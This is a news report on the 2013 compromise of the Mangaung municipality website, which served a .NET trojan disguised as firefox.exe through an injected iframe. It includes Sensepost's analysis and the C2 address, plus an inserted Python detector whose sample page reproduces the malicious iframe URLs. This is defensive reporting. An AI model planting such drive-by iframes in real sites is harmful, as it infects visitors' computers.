Mangaung website hacked, serving malware from Jamaica
The website for the Mangaung municipality (mangaung.co.za, bloemfontein.co.za) is serving malware hosted on the website of the Jamaica Cultural Development Commission (jcdc.gov.jm).
At the time of writing, more than a day after informing both the State Information Technology Agency (SITA) and the JCDC, a Windows executable is automatically downloaded to your computer when you visit the website of the Mangaung municipality.
Interestingly, visiting the JCDC website did not trigger the file download.
The executable is called “firefox.exe” and it was embedded in the Mangaung website using a simple HTML <iframe> tag pointing to http://www.jcdc.gov.jm/uploads/firefox.exe.
The source of the Mangaung website also contained an iframe pointing to a firefox.exe file hosted on shell32.tk, but it appeared to be inaccessible.
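As an added example (not code from the article, Sensepost or Citizen Lab), a small Python check that flags the injection pattern described above: an <iframe> whose src points off-site at an executable file. The sample page source is constructed for the example; the two iframe URLs are the ones named in the article.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# File extensions a browser offers as a download instead of rendering
# (constructed list for this example, not from the article).
EXECUTABLE_EXTS = (".exe", ".msi", ".scr", ".com", ".bat")


class IframeCollector(HTMLParser):
    """Collect the src attribute of every <iframe> tag in a page."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":  # HTMLParser lowercases tag names
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value.strip())


def suspicious_iframes(html, page_host):
    """Return iframe src URLs that pull an executable from another host.

    page_host is the host the page was fetched from; an iframe loading an
    .exe from any other host is the pattern seen on the Mangaung site.
    """
    collector = IframeCollector()
    collector.feed(html)
    hits = []
    for src in collector.srcs:
        parsed = urlparse(src)
        host = parsed.netloc.lower()
        if host and host != page_host.lower() and parsed.path.lower().endswith(EXECUTABLE_EXTS):
            hits.append(src)
    return hits


# Constructed page source modelled on the injection described in the article.
SAMPLE_HTML = """<html><body>
<h1>Mangaung Local Municipality</h1>
<iframe src="http://www.jcdc.gov.jm/uploads/firefox.exe"></iframe>
<iframe src="http://shell32.tk/firefox.exe"></iframe>
<iframe src="/maps/embed.html"></iframe>
</body></html>"""

if __name__ == "__main__":
    for url in suspicious_iframes(SAMPLE_HTML, "www.mangaung.co.za"):
        print("off-site executable iframe:", url)
```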
Masquerading as Firefox? Smells like FinSpy
A report recently released by Citizen Lab revealed that a spyware suite used by governments known as FinFisher sometimes had its trojan (FinSpy) masquerade as Firefox.
Add to this that Citizen Lab reported that it had discovered command & control servers for the spyware suite on the Telkom network in South Africa, and a logical first reaction is to suspect that a version of the FinSpy trojan was being hosted on the Mangaung website.
However, Citizen Lab’s report suggests that FinSpy would use far less overt methods of infecting a machine.
An investigation by Citizen Lab, which was later confirmed by Sensepost, indicated that the malware was not FinFisher.
Taiwanese spyware?
A quick check on VirusTotal did not provide conclusive results as to what this malware might be, but further prodding from Sensepost revealed that the trojan was written in .NET.
Jeremy du Bruyn, a security expert at Sensepost, explained the trojan’s code had been obfuscated, making it more difficult to see what its purpose is.
“It employs a number of measures to make static analysis of the malware more difficult, for instance by calling ‘IsDebuggerPresent’ to check if it is being analysed and if so exit; as well as not using any hardcoded strings,” Du Bruyn said.
The trojan developer appears to be Chinese-speaking, Du Bruyn said, which he said correlates with the Taiwanese IP address of the command & control server.
“The Trojan communicates with an IP in Taiwan, specifically 114.34.216.71 on port 888,” Du Bruyn said.
Malware still being served
At the time of publication the Mangaung website was still serving the malware, despite SITA and the JCDC being alerted to it on Thursday, 30 May 2013.
While the JCDC did not respond by the time of publication, a SITA spokesperson did tell MyBroadband that they don’t provide the hosting for this particular government website.
Thanks to Siavosh, Jeremy, and Dominic of Sensepost for their work in analysing the malware. Thanks to John and the team from Citizen Lab who also provided valuable information for this article.